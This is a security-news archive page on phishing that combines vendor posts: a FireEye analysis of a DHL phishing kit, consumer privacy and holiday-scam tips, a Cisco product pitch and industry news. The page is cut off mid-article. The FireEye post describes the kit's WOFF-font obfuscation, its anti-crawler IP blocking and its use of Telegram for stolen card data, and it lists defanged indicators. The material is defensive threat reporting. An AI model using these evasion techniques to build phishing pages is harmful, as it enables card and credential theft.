Category Archives: Phishing

Emotet Malware Over the Years: The History of an Active Cyber-Threat [Updated]

Malware strains come and go while Internet users become more and more accustomed to online threats being dealt with swiftly by the competent authorities. But what happens when a Trojan constantly eludes everyone’s best efforts to stop it in its tracks? In this article, I will go over the complex history of one of the […]

The post Emotet Malware Over the Years: The History of an Active Cyber-Threat [Updated] appeared first on Heimdal Security Blog.

Isolation-based security technologies are gaining prominence

Cyberinc shared its insights into the key trends that will shape the cybersecurity industry in the coming year. With evolving tactics that increase the risk and impact of ransomware and phishing, combined with the new normal of remote workforces, Cyberinc CEO Samir Shah believes that remote browser isolation (RBI) will prove its value as a critical must-have enterprise technology in 2021. “As mass-scale ransomware and other malware attacks continue to make headlines, companies and IT … More

The post Isolation-based security technologies are gaining prominence appeared first on Help Net Security.

Phishing Campaign Leverages WOFF Obfuscation and Telegram Channels for Communication

FireEye Email Security recently encountered various phishing campaigns, mostly in the Americas and Europe, using source code obfuscation with compromised or bad domains. These domains were masquerading as authentic websites and stole personal information such as credit card data. The stolen information was then shared to cross-platform, cloud-based instant messaging applications.

Coming off a busy holiday season with a massive surge in deliveries, this post highlights a phishing campaign involving a fake DHL tracking page. While phishing attacks targeting users of shipping services is not new, the techniques used in these examples are more complex than what would be found in an off-the-shelf phishing kit.

This campaign uses a WOFF-based substitution cypher, localization specific targeting, and various evasion techniques which we unravel here in this blog.

Attack Flow

The attack starts with an email imitating DHL, as seen in Figure 1. The email tries to trick the recipient into clicking on a link, which would take them to a fake DHL website. In Figure 2, we can see the fake page asking for credit card details that, if submitted, would give the user a generic response while in the background the credit card data is shared with the attackers.

Figure 1: DHL phishing attempt

Figure 2: Fake website imitating DHL tracking

This DHL phishing campaign uses a rare technique for obfuscating its source page. The page source contains proper strings, valid tags, and appropriate formatting, but contains encoded text that would render gibberish without decoding prior to loading the page, as seen in Figure 3. Typically, decoding such text is done by including script functions within the code. Yet in this case, the decoding functions are not contained in the script.

Figure 3: Snippet of the encoded text on page source

The decoding is done by a Web Open Font Format (WOFF) font file, which happens upon loading the page in a browser and will not be visible in the page content itself. Figure 4 shows the substitution cipher method and the WOFF font file. The attacker does this to evade detection by security vendors. Many security vendors use static or regex signature-based rules, so this method will break those naïve-based conditions.

Figure 4: WOFF substitution cipher

Loading this custom font which decodes the text is done inside the Cascading Style Sheets (CSS). This technique is rare as JavaScript functions are traditionally used to encrypt and decrypt HTML text.

Figure 5: CSS file for loading WOFF font file

Figure 5 shows the CSS file used to load the WOFF font file. We have also seen the same CSS file, style.css, being hosted on the following domains:

  • hxxps://www.lifepointecc[.]com/wp-content/sinin/style.css
  • hxxps://candyman-shop[.]com/auth/DHL_HOME/style.css
  • hxxps://mail.rsi-insure[.]com/vendor/ship/dhexpress/style.css
  • hxxps://www.scriptarticle[.]com/thro/HOME/style.css

These legitimate-looking domains are not hosting any phishing websites as of now; instead, they appear to be a repository for attackers to use in their phishing campaigns. We have seen similar phishing attacks targeting the banking sector in the past, but this is newer for delivery websites.  

Notable Techniques


The phishing page displays the local language based on the region of the targeted user. The localization code (Figure 6) supports major languages spoken in Europe and the Americas such as Spanish, English, and Portuguese.

Figure 6: Localization code

The backend contains PHP resource files for each supported language (Figure 7), which are picked up dynamically based on the user’s IP address location.

Figure 7: Language resource files


This campaign employs a variety of techniques to evade detection. This will not serve up a phishing page if the request came from certain blocked IP addresses. The backend code (Figure 8) served the users with a "HTTP/1.1 403 Forbidden" response header under the following conditions:

  • IP has been seen five times (AntiBomb_User func)
  • IP host resolves to its list of avoided host names ('google', 'Altavista', 'Israel', 'M247', 'barracuda', '' and more) (AntiBomb_WordBoot func)
  • IP is on its own local blocklist csv (x.csv in the kit) (AntiBomb_Boot func)
  • IP has seen POSTing three times (AntiBomb_Block func)

Figure 8: Backend evasion code

After looking at the list of blocked hosts, we could deduce that the attackers were trying to block web crawlers.

Data Theft

The attackers behind this phishing campaign attempted to steal credentials, credit card data, and other sensitive information. The stolen data is sent to email addresses and Telegram channels controlled by the attacker. We uncovered a Telegram channel where data is being sent using the Telegram Bot API shown in Figure 9.

Figure 9: Chat log

While using php mail() function to send stolen credentials is quite common, in the near past, encrypted instant messaging applications such as Telegram have been used for sending phished information back to command and control servers.

We were able to access one of the Telegram channels controlled by the attacker as shown in Figure 10. The sensitive information being sent in the chat includes IP addresses and credit card data.

Figure 10: Telegram channel with stolen information


Attackers (and especially phishers) are always on the hunt for new ways to evade detection by security products. Obfuscation gives the attackers an edge, and makes it harder for security vendors to protect their customers.

By using instant messaging applications, attackers get user data in real time and victims have little to respond once their personal information is compromised.

Indicators of Compromise (IOC)

FireEye Email Security utilizing FAUDE (FireEye Advanced URL Detection Engine) protects customers from these types of phishing threats. Unlike traditional anti-phishing techniques dependent on static inspection of phishing URL content, FAUDE uses multiple artificial intelligence (AI) and machine learning (ML) engines to more effectively thwart these attacks.

From December 2020 until the time of posting, our FAUDE detection engine saw more than 100 unique URLs hosting DHL phishing pages with obfuscated source code, including:

  • hxxps://bit[.]ly/2KJ03RH
  • hxxps://greencannabisstore[.]com/0258/redirect-new.php
  • hxxps://directcallsolutions[.]co[.]za/CONTACT/DHL_HOME/
  • hxxps://danapluss[.]com/wp-admin/dhl/home/
  • hxxp://r.cloudcyberlink[.]digital/<path> (multiple paths using same domain)
Email Addresses
  • medmox2k@yandex[.]com
  • o.spammer@yandex[.]com
  • cameleonanas2@gmail[.]com
Telegram Users
  • @Saitama330
  • @cameleon9
  • Md5: 83b9653d14c8f7fb95d6ed6a4a3f18eb)
  • Sha256: D79ec35dc8277aff48adaf9df3ddd5b3e18ac7013e8c374510624ae37cdfba31
  • MD5: b051d61b693c76f7a6a5f639177fb820
  • SHA-256: 5dd216ad75ced5dd6acfb48d1ae11ba66fb373c26da7fc5efbdad9fd1c14f6e3






































Business executives targeted with Office 365-themed phishing emails

An ongoing campaign powered by a phishing kit sold on underground forums is explicitly targeting high-ranking executives in a variety of sectors and countries with fake Office 365 password expiration notifications, Trend Micro researchers warn. The compromised login credentials are likely then sold on those same forums for $250 per account (or even higher). The compromised accounts can be used to send out even more convincing phishing emails, perpetrate BEC scams, or collect sensitive information. … More

The post Business executives targeted with Office 365-themed phishing emails appeared first on Help Net Security.

Take It Personally: Ten Tips for Protecting Your Personally Identifiable Information (PII)

Data Privacy Day

Take It Personally: Ten Tips for Protecting Your Personally Identifiable Information (PII)

Seems like we always have a connected device somewhere within arm’s reach, whether it’s a smartphone, laptop, tablet, a wearable, or some combination of them all. In a way, we bring the internet along with us nearly wherever we go. Yet there’s something else that follows us around as well—a growing body of personally identifiable information, also known as PII.

What is PII?

What is PII? It’s information relating to an identified or identifiable individual when such individual can be identified directly or indirectly, when used alone or linked to other online identifiers provided by their devices, applications, tools and protocols. A prime example is your Social Security Number, if you live in the U.S. That clearly calls out your identity. Further examples include your facial image to unlock your smartphone, your medical information, your finances, your phone number (because it can be easily linked back to you),  internet protocol addresses, or other identifiers such as radio frequency identification tags.

You can also find examples of PII in the accounts you use, like your Google to Apple IDs, which can be linked to your name, your email address, and the apps you have. You’ll also find it in places like the apps you use to map your runs, because the combination of your smartphone’s unique device ID and GPS tracking can be used in conjunction with other information to identify who you are and where you like to do your 5k hill days. The same goes for messenger apps, which can collect how you interact with others, how often you use the app, and your location information based on your IP address, GPS information, or both.

In all, there’s a cloud of PII that follows us around as we go about our day online. Some wisps of that cloud are more personally identifying than others, yet gather enough of it and PII can create a high-resolution snapshot of you—who you are, what you’re doing, when you’re doing it, and even where you’re doing it too—particularly if it gets into the wrong hands.

Protecting your PII protects your identity and privacy

It reminds me of Pig-Pen, the character straight from the old funny pages of Charles Schultz’s Charlie Brown, followed as he was by an ever-present cloud of dust. Charlie Brown once said, “He may be carrying the soil that was trod upon by Solomon or Nebuchadnezzar or Genghis Khan!” Except the cloud surrounding us isn’t the dust of kings and conquerors, they’re motes of digital information that are of tremendously high value to crooks and bad actors—whether for purposes of identity theft or invasion of privacy.

Needless to say, with all PII we create and share on the internet, it means we need to take steps to protect it—lest that PII get abused.

I’ve outlined a set of ten things you can do to help ensure that what’s private stays that way.

1) Use a complete security platform that can also protect your privacy

Square One is to protect your devices with comprehensive security software. This will defend you against the latest virus, malware, spyware, and ransomware attacks plus further protect your privacy and identity. In addition to this, it can also provide it can also provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who may try to force their way into your accounts.

Further, security software can also include a firewall that blocks unwanted traffic from entering your home network, such as an attacker poking around for network vulnerabilities so that they can “break in” to your computer and steal information. Again, setting yourself up with security software really is your first step, as it offers numerous means of protecting your PII and other important information.

In the case of our security software, Identity Theft Protection Essentials is available with every subscription of McAfee Total Protection 5-Device or 10-Device. This allows you to set up monitoring for several key pieces of PII—such as your passport info, Social Security Number, or driver’s license info—so you can be alerted should they appear on the web or Dark Web.

2) Use a VPN

Also known as a virtual private network, a VPN helps protect your vital PII and other data with bank-grade encryption.  The VPN encrypts your internet connection to keep your online activity private on any network, even public networks.  Using a public network without a VPN can increase your cybersecurity risk because  others on the network may be able to easily hack into  your browsing and data.

If you’re new to the notion of using a VPN, check out my recent article on the VPNs and how to choose one so that you can get the best protection and privacy possible.

3) Keep a close grip on your Social Security Number

Here in the U.S., the Social Security Number (SSN) is one of the most prized pieces of PII as it unlocks the door to employment, finances, and much more. First up, keep a close grip on it. Literally. Store your card in a secure location. Not your purse or wallet.

Certain businesses and medical practices may ask you for your SSN for billing practices and the like. You don’t have to provide it (although some businesses could refuse service if you don’t). However, there are a handful of instances where an SSN is a requirement. These include:

  • For employment or contracting with a business
  • Group health insurance
  • Financial and real estate transactions
  • Applying for credit cards, car loans, and so forth

Be aware that many instances of hacked credit cards come by way of internal negligence, rather than the direct efforts of cybercriminals. Minimizing how often you provide your SSN can offer an extra degree of protection.  Personal identifiable information

4) Protect  your files

Protecting your files with encryption is a core concept in data and information security, and thus it’s a powerful way to protect your PII. It involves transforming data or information into code that requires a digital key to access it in its original, unencrypted format. For example, McAfee® Total Protection includes File Lock, which is our file encryption feature that lets you lock important files in secure digital vaults on your device.

Additionally, you should also delete sensitive files with an application such as McAfee Shredder™, which securely deletes files so that thieves can’t access them. (Quick fact: deleting files in your trash doesn’t actually delete them in the truest sense. They’re still there until they’re “shredded” or otherwise overwritten such that they can’t be restored.)

5) Steer clear of those internet “quizzes”

Which Marvel Universe superhero are you? Does it really matter? After all, such quizzes and social media posts are often grifting pieces of your PII in a seemingly playful way. While you’re not giving up your SSN, you may be giving up things like your birthday, your pet’s name, your first car … things that people often use to compose their passwords or use as answers to common security questions on banking and financial sites. The one way to pass this kind of quiz is not to take it!

6) Be on the lookout for phishing attacks

A far more direct form of separating you from your PII are phishing attacks. Posing as emails from known or trusted brands and financial institutions, a cybercrook’s phishing attack will  attempt to trick you into sharing important information like your logins, account numbers, credit card numbers, and so on under the guise of providing customer service.

How do you spot such emails? Well, it’s getting a little tougher nowadays because scammers are getting more sophisticated and can make their phishing emails look nearly legitimate. However, there are several ways you can spot a phishing email as outlined here.

Comprehensive security offers another layer of prevention here, in this case by offering browser protection like our own Web Advisor, which will alert you in the event you come across suspicious links and downloads that can steal your PII or otherwise expose you to attacks.

7) Keep mum in your social media profile

With social engineering attacks that deceive victims by posing as people the victim knows and the way we can sometimes overshare a little too much about our lives, you can see why a social media profile is a potential goldmine for cybercriminals.

Two things you can do to help protect  your PII from being at risk via social media: one, think twice about what PII you might be sharing in that post or photo—like the location of your child’s school or the license plate on your car; two, set your profile to private so that only friends can see it. Review your privacy settings regularly to keep your profile information out of the public eye. And remember, nothing is 100% private on the internet. Never post anything you wouldn’t want to see shared.

8) Look for HTTPS when you browse

The “S” stands for secure. Any time you are shopping, banking, or sharing any kind of PII, look for “https” at the start of the web address. Some browsers will also indicate HTTP by showing a small “lock” icon. Doing otherwise on plain HTTP sites exposes your PII for anyone who cares to monitor that site for unsecure connections.

9) Lock your devices—and keep an eye out for “shoulder surfers”

By locking your devices, you protect yourself that much better from PII and data theft in the event your device is lost, stolen, or even left unattended for a short stretch. Use your password, PIN, facial recognition, thumbprint ID, what have you. Just lock your stuff.

And just like you covered your work while taking that math test in grade school, cover your work when you’re out in public. Or better yet, do your shopping, banking, and other sensitive work strictly at home or in another controlled situation. The thing is, crooks are happy to lower themselves and simply peep over your shoulder to get the PII they want.

While it’s necessary to talk about all of the digital ways a criminal can skim your PII, it’s important to remember that physical security, like being aware of your surroundings and simply not leaving your laptop in the car even for a moment while you pay for gas inside the station, is just as important.

10) Keep tabs on your credit

Theft of your PII can of course lead to credit cards and other accounts being opened falsely in your name. What’s more, it can be some time be some time before you even become aware of it, until perhaps your credit score takes a hit or a bill collector comes calling. By checking your credit, you can address any issues that come up, as companies typically have a clear-cut process for contesting any fraud. You can get a free credit report in the U.S. via the Federal Trade Commission (FTC) and likewise other nations like the UK have similar free offerings as well.

Consider identity theft protection as well. A good identity theft protection package pairs well with keeping track of your credit in the way I mentioned above, and should offer cyber monitoring that scans black market sites on the Dark Web, and Social Security Number monitoring that can detect if any new aliases or addresses are attached to your number.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Take It Personally: Ten Tips for Protecting Your Personally Identifiable Information (PII) appeared first on McAfee Blogs.

Automate your way to success with Cisco SecureX

Take back control with an integrated security platform

In a makeshift SOC in the corner of his home, Matt starts his day with an alarm going off on his computer. There are four monitors ganged together, multiple consoles on each one of them, and numerous empty coffee mugs. This probably draws a snapshot of what’s been real for many of us. On top of the never-ending list of alerts in his inbox every morning, he is building playbooks, threat hunting, scanning news for the latest attack updates, and investigating alerts. Coffee stopped working a couple of hours ago. Matt wished he had more time in the day. and it’s only 9 AM. 

Imagine if Matt started his morning by simply reviewing the work that already took place through scheduled or eventbased automation. The orchestration would simply happen in the background, dramatically reducing the friction and repetition in his processes, save time, and lower ongoing costs. Attempting to counter attacks with manual processes is like fighting a losing battle against relentlessly active adversariesWith attackers automating their offense, security teams must do the same for a stronger defense powered by an integrated security platform. 

Cisco SecureX maximizes efficiency 

It’s been almost a year since we announced the Cisco SecureX platform at RSA 2020. You don’t need me to tell you it’s been quite a journey since then. We had no idea, however, of the rigor of the tests that SecureX would get before it even turned a year old.With SecureX, we reimagined how security enabled your business — the need to consolidate functionality, simplify operations, and develop an open platform that would work with customers existing environments 

Getting started with security orchestration and automation 

In my last blog, I spoke about the advantages of using orchestration and how it can maximize operational efficiency. SecureX orchestration is a workflow automation feature of our platform that enables you to define workflows to replace your typical security processes; the automation steps (activities), the logic or flow between these steps, and how to flow data from one step to the next. With Cisco SecureX, you can leverage Cisco and third-party systems, applications, databases, and network devices in your environment to create these workflows. The platform includes full multi-domain orchestration with a no/low-code approach and an intuitive drag-and-drop canvas to deliver a high-performance, scalable playbook automation capability.  

Let’s talk about two important use cases that present opportunities for automation in your environment. Both workflows are especially relevant today, with an uptick in phishing scams during the current global pandemic and the recent SolarWinds supply chain attack.  

1) Maneuvering the SolarWinds attacks with an integrated approach  

Cyberattacks targeting the software supply chain have been on the rise. Since the discovery of the SolarWinds supply chain attack in early December, some security teams are scrambling to assess the impact, while others are revisiting their risk management practices and incident response playbooks. On the bright side, the Solarwinds attack may be a catalyst for transformation in your organization. As the industry comes to terms with the scope of the SolarWinds Orion / Sunburst backdoor cyberattack and associated breaches, our team has taken steps to help customers who may have been impacted. While the story continues to evolve, customers want to understand immediate risks to their business, how to recover if they have been breached, and what they can do to improve their security posture in the future. Here is how you can maneuver the SolarWinds Attacks with an integrated approach. 

The SolarWinds supply chain attack workflow is designed to conduct an automated investigation based on the content of a Talos SolarWinds threat advisory blog post. The workflow starts by using the blog post as a source for observables and then SecureX threat response determines which of those observables are worth digging in to. Since SecureX is being used to investigate, the results of the workflow are tailored to each customer’s environment and telemetry from their integrated products. When the investigation is complete, you can document the findings in a SecureX threat response casebook and incident manager, ServiceNow incident ticket, and send notifications using Webex Teams, Slack, and email. The workflow also has an option to create an approval task that, upon approval, sets off automated remediation for non-clean observables. You can automate security workflows that are reactive to network and system states. And with playbooks that execute at machine speed, customers can reduce research and response time while also improving precision with less overhead.   

“If you want to know the impact of the Orion malware, it will say, “Hey, I have this webpage showing me indicators of compromise with SecureX,” I basically get a button within my browser and I say, whatever is on this page, check it against my live environment.”  

Wouter Hindriks
Technical Team Lead Network & Security at Missing Piece BV 


Explore the sample workflow HERE


See how Cisco is moving forward after the SolarWinds breach and understand how the SecureX platform approach can reduce dwell time for infrastructure attacks by exploring our rapid response webpage.  

Automate Phishing investigations and remediation 

Phishing emails are not a new type of threat to most security professionals but dealing with the growing volume and potential impact of them requires an innovative solution. The SecureX platform now supports sample workflow for phishing that can help you accelerate investigation and respond to phishingbased email threats in your environment. By shortening the investigation timeline through security automation, your team can ensure that they’re not wasting valuable cycles performing repetitive, manual tasks. 

This workflow is designed to be triggered by an email arriving in a phishing investigation mailbox. When an email is received, the workflow investigates its attachments and attempts to determine if anything in the email (or its attachments) was suspicious or malicious.  This accelerates threat hunting and incident management. If anything suspicious or malicious is found, the user who submitted the email is told to delete it. A SecureX threat response casebook and incident are also created and notifications are sent via Webex Teams and email. This powerful workflow simplifies the complexity of handling phishing attempts, providing mailbox monitoring for incoming phishing reports. 

Next steps: Getting started with SecureX

Security orchestration between multiple technologies will create opportunities for automation critical for success in the modern threat landscape. Now Matt can get a head start with pre-built sample workflows aligned to common use cases that can eliminate friction in the processes and automate routine tasks.

Set SecureX up in minutes and see the benefits almost immediately! Get Simplicity. Visibility. Efficiency today. If you are new to Cisco, explore our portfolio to start a trial. And if you are already a Cisco Secure customer and want to learn more? Watch a quick SecureX demo and explore additional workflows on GitHub to learn more.


More resources:


Passwords stolen via phishing campaign available through Google search

Bad ops of operators of a phishing campaign exposed credentials stolen in attacks and made them publicly available through Google queries. 

Check Point Research along with experts from cybersecurity firm Otorio shared details on their investigation into a large-scale phishing campaign that targeted thousands of global organizations.

The campaign has been active since August, the attackers used emails that masqueraded as Xerox scan notifications that were urging recipients into opening a malicious HTML attachment. This trick allowed the attackers to bypass Microsoft Office 365 Advanced Threat Protection (ATP) filtering and stole over a thousand corporate employees’ credentials.


The experts noticed that operators behind the phishing campaign focused on Energy and Construction companies, but they accidentally exposed credentials stolen in attacks that were publicly viewable with a simple Google search. 

Operators of a phishing campaign targeting the construction and energy sectors exposed credentials stolen in attacks that were publicly viewable with a simple Google search. 

“Interestingly, due to a simple mistake in their attack chain, the attackers behind the phishing campaign exposed the credentials they had stolen to the public Internet, across dozens of drop-zone servers used by the attackers. With a simple Google search, anyone could have found the password to one of the compromised, stolen email addresses:  a gift to every opportunistic attacker.” reads the post published by Check Point.

Once the victim double-clicked the HTML file, a blurred image with a preconfigured email within the document is opened in the browser.

Upon launching the HTML file, a JavaScript code will be executed in the background, it gathers the password, sends the data to the attackers’ server, and redirect the user to a legitimate Office 365 login page.

Phishers used both unique infrastructure and compromised WordPress websites used to store the stolen data.

“We discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named “go.php”, “post.php”, “gate.php”, “rent.php” or “rest.php”) and processed all incoming credentials from victims of the phishing attacks.” continues the post.

“Attackers usually prefer to use compromised servers instead of their own infrastructure because of the existing websites’ well-known reputations. The more widely recognized a reputation is, the chances are higher that the email will not be blocked by security vendors”

The emails were sent from a Linux server hosted on Microsoft’s Azure, they were often sent by using PHP Mailer 6.1.5 and delivered using 1&1 email servers.

Attackers also sent out spam messages through compromised email accounts to make messages appear to be from legitimate sources. 

Data sent to the drop-zone servers were saved in a publicly visible file that was indexable by Google. This means that they were available to anyone with a simple Google search.

The analysis of a subset of ~500 stolen credentials revealed that victims belong to a wide range of target industries, including IT, healthcare, real estate, and manufacturing.

Check Point shared its findings with Google.

Experts noticed that the JavaScript encoding used in this campaign was the same used in another phishing campaign from May 2020, a circumstance that suggests that the group threat actor is behind the two campaigns.

The report also includes Indicators of Compromise (IoCs).

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, phishing)

The post Passwords stolen via phishing campaign available through Google search appeared first on Security Affairs.

Most CISOs believe that human error is the biggest risk for their organization

53% of CISOs and CSOs in the UK&I reported that their organization suffered at least one significant cyberattack in 2020, with 14% experiencing multiple attacks, a Proofpoint survey reveals. This trend is not set to slow down, with 64% expressing concern that their organization is at risk of an attack in 2021. Those in larger organizations feel at greater threat, with this figure jumping to 89% amongst CSOs and CISOs from organizations over 2,500 employees … More

The post Most CISOs believe that human error is the biggest risk for their organization appeared first on Help Net Security.

Malware incidents on remote devices increase

52% of organizations experienced a malware incident on remote devices in 2020, up from 37% in 2019, a Wandera report reveals. Of devices compromised by malware in 2020, 37% continued accessing corporate emails after being compromised and 11% continued accessing cloud storage, highlighting a need for organizations to better determine how to configure business tools to ensure fast and safe connectivity for all users in 2021. Other findings In 2020, 28% of organizations were regularly … More

The post Malware incidents on remote devices increase appeared first on Help Net Security.

Phishers count on remotely hosted images to bypass email filters

Loading remotely hosted images instead of embeedding them directly into emails is one of the latest tricks employed by phishers to bypass email filters. Phishers are always finding new ways trick defenses Phishing emails – especially when impersonating popular brands – contain widely known brand logos and other images to give the illusion of having been sent by legitimate organizations. Images have also been used for ages as a way to circumvent an email’s textual … More

The post Phishers count on remotely hosted images to bypass email filters appeared first on Help Net Security.

8 Cloud Security Best Practice Fundamentals for Microsoft Azure

In a previous blog, I discussed securing AWS management configurations by combating six common threats with a focus on using both the Center for Internet Security (CIS) Amazon Web Services Foundations benchmark policy along with general security best practices. Now I’d like to do the same thing for Microsoft Azure. I had the privilege of being involved […]… Read More

The post 8 Cloud Security Best Practice Fundamentals for Microsoft Azure appeared first on The State of Security.

Cyber Security Roundup for December 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, November 2020.

Manchester United FC remains impacted by a seemly major cyber-attack, which I covered in a blog post titled The Multi-Million Pound Manchester United Hack. At this point, United have provided few details about their cyber-attack which has been impacting club's IT systems for well over a week. However, the UK media are widely reporting United's leaky IT defences was unable to prevent a ransomware attack and data theft.  London's Hackney Borough Council have also been tight-lipped about what they describe as "a serious cyber-attack" which has impacted its service delivery to Londoners. Like United, this attack has all the hallmarks of a mass ransomware outbreak. Both Manchester United and Hacknet Council said they are working UK's National Cyber Security Centre (NCSC).

Man.Utd hit by ransomware, who's next?

Street Fighter games maker Capcom also reported to be compromised by a ransomware attack, with up to 350,000 people said to be affected, along some of Capcom's financial information stolen. The Ragnar locker hacker group were said to be behind the attack, although indications are that Capcom hasn't given in to their ransom demands after an ominous message appeared on the Ragnar group's website, which said Capcom didn't "make a right decision and save data from leakage". 

The ransomware attacks will be going from bad to worse in 2021 according to Sophos. In its annual threat report, Sophos anticipates ransomware tactics, techniques and procedures are to become more evasive, with criminal threat actor operating more like nation-state attackers. Sophos also expects an increase in the number of entry-level, apprentice-type attackers looking for menu-driven, ransomware-for-rent, meaning the technical barrier preventing general nefarious folk orchestrating ransomware attacks is getting lower.

Its likely COVID-19 has saved Ticketmaster from a more substantial DPA/GDPR fine after the Information Commissioners Office (ICO) announced it had fined the gig ticket selling company a mere £1.25 million for failing to keep 9 million of its customer's personal data and payment cards secure.  The ICO investigation concluded a vulnerability in a third-party chatbot installed on Ticketmaster's online payments page was exploited and used to access its customer card payment details. Following the breach, 60,000 Barclays bank customers were victims of fraud, while online bank Monzo had to replace 6,000 payment cards due to fraud. Ticketmaster said it would appeal against the ICO ruling. 

An interesting new UK law is in the offing which proposes fines of 10% of turnover or more than £100,000 a day for telecoms operators that use of Huawei network equipment within their 5G networks. The bill provides the UK government new powers to force out Huawei usage with the UK telecoms giants, the threatened sum of £100,000 a day would only be used in the case of "continuing contravention" according to number 10.

Consumer group Which warned security flaws in popular smart doorbells are placing UK consumers at risk. The watchdog tested 11 smart doorbell (IoT) devices purchased from popular online marketplaces like Amazon, the dodgy products were said to have been made by Qihoo, Ctronics and Victure. The most common security flaws found by Which were weak password policies and a lack of data encryption. Two of the devices could be manipulated to steal network WiFi passwords, providing the opportunity for an attacker to then hack other smart devices within the home.

The NCSC released its annual review, confirming what we already know about the commonality of ransomware attacks on UK organisations.  The NCSC also accused Russia of trying to steal vaccine-related information through cyber-espionage, advising an "ongoing threat" of nation-states targeting the UK vaccine research-and-delivery programmes. The NCSC were not alone in pointing the finger at nation-state threat actors going after COVID-19 vaccines, Microsoft also reported state-backed hackers from Russian and North Korea were targeting organisations working on a coronavirus vaccine. The Russian group "Fancy Bear" and North Korean groups "Zinc" and "Cerium" were fingered by Microsoft as the culprits behind a spate recent cyber-attacks. Microsoft said Fancy Bear were brute-forcing accounts with millions of different passwords combinations, while North Korean groups sent spear-phishing emails posing as World Health Organisation officials, in an attempt to trick researchers into handing over their login credentials and research data. 

Stay safe and secure.



    Top Phishing Lures to Look Out for This Holiday Season

    holiday phishing scams

    Top Phishing Lures to Look Out for This Holiday Season

    And just like that, the holidays are here! That means it’s time to grab your devices and credit cards for some online holiday shopping. But while you plan to share the merry and shop for gifts, criminals are preparing some not-so-festive tricks of their own. According to Threatpost, various phishing scams are currently targeting eager consumers this holiday season.

    Let’s unwrap the top four phishing scams that users should beware of while making online purchases this week and through the rest of the year.

    Email Phishing: How Cyber-Grinches Steal Your Inbox

    It might surprise you to see that a tactic as old as email phishing is still so widely used today. Well, that’s because many people still fall for email phishing scams, as the criminals behind these attacks up the ante every year to make these threats more sophisticated.

    Scammers also tend to take advantage of current events to trick unsuspecting consumers into falling for their tricks. Take earlier this year, for example, when many users received phishing emails claiming to be from a government entity regarding financial support due to the global health emergency. Cybercriminals will likely use similar, timely tactics leading up to the holidays, posing as famous retailers and promising fake discounts in the hope that a consumer will divulge their credit card details or click on a malicious link.

    Spear Phishing Takes Advantage of the Season of Giving

    Like email phishing, spear phishing has been around for quite some time. With spear phishing attacks, hackers pretend to be an organization or individual that you’re familiar with and include a piece of content—a link, an email attachment, etc.—that they know you’ll want to interact with. For example, cybercriminals might claim to be charitable organizations asking for donations, knowing that many families like to donate during the holidays. The email might even include the recipient’s personal details to make it seem more convincing. But instead of making a generous contribution, users find that they infected their own system with malware by clicking on the fraudulent link.

    Dasher, Dancer, Prancer, Vishing?

    No, that’s not the sound of Santa coming down the chimney – it’s the sound of voice phishing! “Vishing” attacks can be highly deceiving, as hackers will call a user and trick them into giving up their credentials or sharing other personal information. For example, a scammer could call an individual telling them that they won a large amount of cash as part of a holiday contest. Overjoyed with the thought of winning this so-called contest, the user may hand over their bank information to the criminal on the other end of the phone. But instead of receiving a direct deposit, all they find is that their banking credentials were used to make a fraudulent purchase.

    Special Delivery or SMiShing?

    SMS phishing, or “SMiShing,” is another threat users should watch out for this holiday season. This tactic uses misleading text messages claiming to come from a trusted person or organization to trick recipients into taking a certain action that gives the attacker exploitable information or access to their mobile device.

    Due to the current global health emergency and the desire to do more digitally, consumers will likely rely on online shopping this holiday season. To take advantage of this trend, scammers will probably send fraudulent text messages disguised as online retailers. These messages will likely contain fake tracking links, shipping notices, and order confirmations. But if an unsuspecting user clicks on one of these links, they will be directed to a fake website prompting them to enter their credentials for the attackers to further exploit.

    Avoid Unwanted Security “Presents” This Holiday Season

     To prevent cybercriminals from messing with the festive spirit via phishing schemes, follow these tips so you can continue to make merry during the holiday shopping season:

    Be cautious of emails asking you to act 

    If you receive an email, call, or text asking you to download software or pay a certain amount of money, don’t click on anything or take any direct action from the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links or forking over money unnecessarily.

    Hover over links to see and verify the URL

    If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether.

    Go directly to the source

    Instead of clicking on a link in an email or text message, it’s always best to check directly with the source to verify a holiday shopping offer or track a package’s shipment.

    Browse with caution

    Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

    Stay Updated

    To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.



    The post Top Phishing Lures to Look Out for This Holiday Season appeared first on McAfee Blogs.

    Trick or Treat: Avoid These Spooky Threats This Halloween

    Halloween scams

    Trick or Treat: Avoid These Spooky Threats This Halloween

    Spooky season is among us, and ghosts and goblins aren’t the only things hiding in the shadows. Online threats are also lurking in the darkness, preparing to haunt devices and cause some hocus pocus for unsuspecting users. This Halloween season, researchers have found virtual zombies and witches among us – a new trojan that rises from the dead no matter how many times it’s deleted and malicious code that casts an evil spell to steal users’ credit card data.

    Let’s unlock the mystery of these threats so you can avoid cyber-scares and continue to live your online life free from worry.

    Zombie Malware Hides in the Shadows

    Just like zombies, malware can be a challenge to destroy. Oftentimes, it requires a user to completely wipe their device by backing up files, reinstalling the operating system, and starting from scratch. But what if this isn’t enough to stop the digital walking dead from wreaking havoc on your device?

    Recently, a new type of Trojan has risen from the dead to haunt users no matter how many times it’s deleted. This zombie-like malware attaches itself to a user’s Windows 10 startup system, making it immune to system wipes since the malware can’t be found on the device’s hard drive. This stealthy malware hides on the device’s motherboard and creates a Trojan file that reinstalls the malware if the user tries to remove it. Once it sets itself up in the darkness, the malware scans for users’ private documents and sends them to an unknown host, leaving the user’s device in a ghoulish state.

    Cybercriminals Leave Credit Card Users Spellbound

